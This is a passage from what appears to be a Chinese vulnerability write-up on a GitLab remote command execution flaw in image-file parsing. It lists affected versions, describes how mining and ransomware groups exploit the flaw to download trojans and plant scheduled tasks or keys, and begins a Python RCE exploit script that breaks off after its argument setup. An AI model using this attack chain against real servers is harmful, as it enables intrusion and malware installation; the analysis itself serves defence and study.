目录
一、概述
GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。但漏洞版本中,GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行。
二、影响版本
可通过终端命令cat /opt/gitlab/embedded/service/gitlab-rails/VERSION查看版本。当前有以下版本受影响:
11.9<=Gitlab CE/EE<13.8.8
13.9<=Gitlab CE/EE<13.9.6
13.10<=Gitlab CE/EE<13.10.3
三、漏洞复现
1、利用vulhub一键化搭建漏洞环境,启动完成后进入漏洞界面


2、常规攻击场景
(1)下载挖矿病毒或者勒索病毒场景?
在这种场景下,挖矿或者勒索家族会批量扫描公网上存在漏洞的gitlab,基本操作是利用漏洞后执行下载恶意木马文件后执行木马,或者权限足够的情况下,写入计划任务、公钥,实现定期下载病毒样本或登录后下载恶意样本(偏向自动化)。
import requests
from bs4 import BeautifulSoup
import random
import os
import argparse
parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
parser.add_argument('-u', help='Username', required=True)
parser.add_argument('-p', help='Password', required=True)
parser.add_argument('-c', help='Command', required=True)
parser.add_argument('-t', help='URL (Eg: http://gitl

漏洞分析及排查&spm=1001.2101.3001.5002&articleId=132237383&d=1&t=3&u=c7a59b8bda9a40df821cfa006ca35da4)
1万+

被折叠的 条评论
为什么被折叠?



